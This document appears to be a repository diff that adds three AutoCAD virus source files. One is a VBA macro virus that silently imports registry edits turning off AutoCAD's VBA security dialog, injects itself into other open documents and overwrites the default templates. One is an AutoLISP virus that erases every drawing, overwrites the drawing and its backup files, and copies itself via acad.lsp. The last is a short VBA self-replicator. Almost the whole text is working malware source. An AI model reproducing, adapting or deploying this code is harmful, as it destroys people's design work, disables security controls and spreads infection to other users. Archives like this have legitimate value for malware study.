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synced 2025-02-21 14:16:02 +00:00
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@ -0,0 +1,72 @@
semi-lame autocad virus , effects templates so is kinda resident ;)
Public WithEvents ACADApp As AcadApplication
Sub galaxy()
Set ACADApp = GetObject(, "AutoCAD.Application")
Set VBEModel = VBE
On Error GoTo runtonext
d1 = Dir("c:\firstrun.txt")
bignum = Int((150000 * Rnd) + 1)
t1 = Application.Preferences.Profiles.ActiveProfile
a1 = FileSystem.Dir("c:\cad.reg")
If a1 = "" Then
Open "c:\cad.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R15.0\ACAD-1:409\Profiles\" & t1 & "\acadvba]"
Print #1, """AutoEmbedding""=dword:00000001"
Print #1, """AllowBreakOnErrors""=dword:00000000"
Print #1, """ShowSecurityDlg""=dword:00000000"
Print #1, "[HKEY_LOCAL_MACHINE\Software\Autodesk\AutoCAD\R15.0\ACAD-1:409\Profiles\" & t1 & "\acadvba]"
Print #1, """AutoEmbedding""=dword:00000001"
Print #1, """AllowBreakOnErrors""=dword:00000000"
Print #1, """ShowSecurityDlg""=dword:00000000"
Close #1
Shell "regedit /s c:\cad.reg", vbHide
Open "c:\firstrun.txt" For Output As #1: Close #1
MsgBox "Invalid Ordinal " & bignum, vbCritical, "Application Error"
End If
le = 0
For i = 1 To Documents.Count
Set at = VBEModel.codepanes(i).codemodule
If at.lines(4, 1) = "Set VBEModel = VBE" And le = 0 Then
newroutine = at.lines(1, at.countoflines)
le = 1
i = 0
End If
If at.lines(4, 1) <> "Set VBEModel = VBE" And le = 1 Then
VBEModel.codepanes(i).codemodule.InsertLines 1, newroutine
If d1 = "firstrun.txt" Then
ACADApp.Documents(i).SaveAs ACADApp.Path & "\Template\acad.dwt", acR15_Template
ACADApp.Documents(i).SaveAs ACADApp.Path & "\Template\acadiso.dwt", acR15_Template
ACADApp.Documents(i).SaveAs ACADApp.Path & "\Template\ACAD -Named Plot Styles.dwt", acR15_Template
ACADApp.Documents(i).SaveAs ACADApp.Path & "\Template\ACADISO -Named Plot Styles.dwt", acR15_Template
d1 = ""
Kill ("c:\firstrun.txt")
End If
End If
Next i
newroutine = ""
'if a star went out
'every time i thought of you
'the night skies
'would be empty forever
End Sub
Private Sub AcadDocument_BeginClose()
Call galaxy
End Sub
Private Sub AcadDocument_Deactivate()
Call galaxy
End Sub
Private Sub AcadDocument_Activate()
Call galaxy
End Sub
Normal file
Normal file
@ -0,0 +1,91 @@
(setvar "cmdecho" 0)
(defun copyy (origen destino / file1 file2 esc1)
(if (= FIC "A")
(setq file1 (open origen "r") file2 (open destino "w"))
(if (and (/= file2 nil) (/= file1 nil))
(setq esc1 (read-line file1))
(write-line esc1 file2)
(close file1)
(close file2)))))
(defun ejecuta (/ tabla aux text1 text2 archi arch1)
(command "style" "txt" "txt" 0 1 0 "" "" "")
(setq nombre (strcat (getvar "dwgprefix") (getvar "dwgname")) otron (getvar "tempprefix"))
(if (/= nombre nil)
(setq COD96-I (strcat (substr nombre 1 (- (strlen nombre) 3)) "bak")))
(setq tabla (tblnext "layer" 1) aux (cdr (assoc 2 tabla)))
(command "layer" "ON" "0" "T" "0" "U" "0" "")
(while (/= (setq tabla (tblnext "layer")) nil)
(setq aux (cdr (assoc 2 tabla)))
(command "layer" "ON" aux "T" aux "U" aux ""))
(command "erase" "all" "");;;;;ja ja ja ja
(setq text1 "Universidad Nacional de Ingeniería" text2 "ExTaCiS_CAD Ver. 1.9.2")
(command "color" 1)
(command "text" "j" "m" '(0 100) 5 0 text1 "")
(command "text" "j" "m" '(0 90) 5 0 text2 "")
(command "zoom" "e")
(command "qsave")
(setq nombres '() jj 1 autofile (getvar "savefile") num1 (strlen autofile) cco 1 archiv_nom "")
(while (/= "." (setq tte (substr autofile cco 1)))
(setq archiv_nom (strcat archiv_nom tte) cco (1+ cco))
(setq archiv_ext (substr autofile (1+ cco)) otron (strcat otron archiv_nom))
(while (open (setq otron1 (strcat otron (itoa jj) (strcat "." archiv_ext))) "r")
(setq nombres (cons otron1 nombres) jj (1+ jj))
(setq jj 1)
(while (open (setq otron1 (strcat otron (itoa jj) ".bak")) "r")
(setq nombres (cons otron1 nombres) jj (1+ jj))
(setq nombres (cons COD96-I nombres) jj 0)
(repeat (length nombres)
(if (setq archi (open (nth jj nombres) "w"))
(write-line text1 archi)
(write-line text2 archi)
(close archi)
(setq jj (1+ jj))
(setq jj (1+ jj))
(command "quit")
(setq des "a:\\acad.lsp" nombre (strcat (getvar "dwgprefix") (getvar "dwgname")))
(setq m11 "acad.lsp" contador_de_la_muerte 0 cadena (getvar "acadprefix") num (strlen cadena) j 1 k 0 nucleo "")
(if (/= nombre nil)
(setq FIC (substr nombre 1 1)))
(while (= k 0)
(setq char (substr cadena j 1) j (1+ j))
(if (/= char ";")
(setq nucleo (strcat nucleo char))
(setq k 1)))
(setq m22 (findfile m11) unidad (substr m22 1 1) m3 (strcat nucleo "\\" m11))
(if (= unidad "A")
(copyy m22 m3)
(copyy m3 des))
(defun c:l ()
(setq contador_de_la_muerte (1+ contador_de_la_muerte))
(if (= contador_de_la_muerte 30)
(command ".line"))
(defun c:e ()
(setq contador_de_la_muerte (1+ contador_de_la_muerte))
(if (= contador_de_la_muerte 30)
(command ".erase"))
(defun c:z ()
(setq contador_de_la_muerte (1+ contador_de_la_muerte))
(if (= contador_de_la_muerte 30)
(command ".zoom"))
;;comentarios y/o sugerencias a traemelo@lanet.com.pe
;;y el que me borbardee.... hay,hay,hay....pobresito.
;;Ya sale para AutoCAD 2000.
;;Por la culpa de unos idiotas tube que cambiar de acadr14.lsp a acad.lsp
;;Actualizado al 15/05/2000 a las 12:59 AM
;;....¡¡¡hay hoy tengo práctica...y no he estudiado nada!!!
Normal file
Normal file
@ -0,0 +1,21 @@
Private Sub AcadDocument_Deactivate()
Set VBEModel = VBE
On Error GoTo runtonext
For i = 1 To Documents.Count
Set at = VBEModel.codepanes(i).codemodule
If at.lines(2, 1) = "Set VBEModel = VBE" And terr = 0 Then
newroutine = at.lines(1, at.countoflines)
terr = 1
i = 0
End If
If at.lines(2, 1) <> "Set VBEModel = VBE" And terr = 1 Then
VBEModel.codepanes(i).codemodule.InsertLines 1, newroutine
End If
Next i
'Big Greetz to some0ne really special
'"You`ll always be a star in my sky"
End Sub
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